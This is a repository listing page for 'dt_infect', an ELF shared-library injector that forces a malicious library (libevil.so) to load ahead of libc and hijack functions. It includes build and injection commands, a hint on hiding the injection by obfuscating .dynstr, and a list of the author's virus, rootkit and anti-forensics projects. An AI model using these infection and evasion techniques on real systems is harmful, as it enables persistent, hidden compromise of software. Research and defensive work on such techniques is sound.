• Stars
    star
    106
  • Rank 325,871 (Top 7 %)
  • Language
    C
  • Created almost 6 years ago
  • Updated over 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

ELF Shared library injector using DT_NEEDED precedence infection. Acts as a permanent LD_PRELOAD

dt_infect v1.0

Author: ElfMaster 2/15/19 - [email protected]

ELF Shared library injector using DT_NEEDED precedence infection. Acts as a permanent LD_PRELOAD

NOTE: It does not work on PIE executables because it uses a reverse text padding infection to create room
for .dynstr. This could be replaced with a text padding infection, or a PT_NOTE to PT_LOAD conversion
infection in order to store the .dynstr; then it would be compatible with PIE executables.

# Build
git clone https://github.com/elfmaster/libelfmaster
cd libelfmaster; make; sudo make install
https://github.com/elfmaster/dt_infect/issues
# Example

-- Run test before it is infected

$ ./test
Don't infect me please

-- Then inject libevil.so into test and hijack puts()

$ make
$ ./inject libevil.so test
Updating .dynstr section
Modified d_entry.value of DT_STRTAB to: 3ff040 (index: 9)
Successfully injected 'libevil.so' into target: 'test'. Make sure to move 'libevil.so' into one of the shared object search paths, i.e. /lib/x86_64-gnu-linux/
$ readelf -d test | grep NEEDED
 0x0000000000000001 (NEEDED)             Shared library: [libevil.so]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
$ ./test
D0n'7 1nf3c7 m3 pl3453

# Further work with obfuscation

I will give a hint, since adding this extra layer of obfuscation will make this DT_NEEDED
much harder to detect... but there are several pieces of software out there that can obfuscate
the dynamic string table, which will prevent DT_NEEDED from showing up. The simplest formula
is to zero out .dynstr in the target binary, and inject some constructor code that replaces it
at runtime. @ulexec wrote a much better one that uses a custom runtime resolver.

More Repositories

1

libelfmaster

Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
C
403
star
2

ftrace

POSIX Function tracing
C
323
star
3

skeksi_virus

Devestating and awesome Linux X86_64 ELF Virus
C
221
star
4

ecfs

extended core file snapshot format
C
219
star
5

maya

Highly advanced Linux anti-exploitation and anti-tamper binary protector for ELF.
C
151
star
6

dsym_obfuscate

Obfuscates dynamic symbol table
C
134
star
7

saruman

ELF anti-forensics exec, for injecting full dynamic executables into process image (With thread injection)
C
126
star
8

kdress

Transform vmlinuz into a fully debuggable vmlinux that can be used with /proc/kcore
C
121
star
9

binflow

This is the new ftrace (https://github.com/elfmaster/ftrace) - Much faster, better resolution but not complete yet! :)
C++
107
star
10

sherlocked

Universal script packer-- transforms any type of script into a protected ELF executable, encrypted with anti-debugging.
Objective-C
102
star
11

linker_preloading_virus

An example of hijacking the dynamic linker with a custom interpreter who loads and executes modular viruses
C
58
star
12

taskverse

A tool like /bin/ps but uses /proc/kcore for walking the tasklist; this finds hidden processes
C
56
star
13

libelfmaster_examples

Simple ELF tools written to demonstrate libelfmaster capabilities.
C
37
star
14

kprobe_rootkit

Linux kernel rootkit using kprobes (From http://phrack.org/issues/67/6.html)
C
35
star
15

ecfs_exec

Be able to execute memory snapshots so they can start running where they left off.
C
34
star
16

static_binary_mitigations

relros.c applies RELRO to static binaries, and static_to_dyn.c applies ASLR to static binaries.
C
32
star
17

shiva

Shiva is a programmable dynamic linker for loading ELF microprograms
Roff
29
star
18

davinci

Transforms any file into a protected ELF executable
C
26
star
19

scop_virus_paper

ELF Virus infection techniques that work with SCOP (Secure code partitioned) executables
C
14
star
20

fork_trace

C++
10
star
21

avu32

anti virus 32bit. my first attempt (in 2008) to write prototype for detecting/disinfecting unix ELF viruses
C
8
star
22

canaryism

Canaryism will tell you which functions are protected with gcc stack canaries
C
6
star
23

packt_book

C
6
star
24

interpx_documentation

4
star
25

shiva_blogposts

Multiple blogposts are maintained here.
3
star
26

shiva_presentations

2
star
27

unix_virus_anniversary

2
star
28

veriexec.linux

Veriexec implementation for Linux
C
2
star
29

poetry

Transcribing my poetry from 19yrs ago
1
star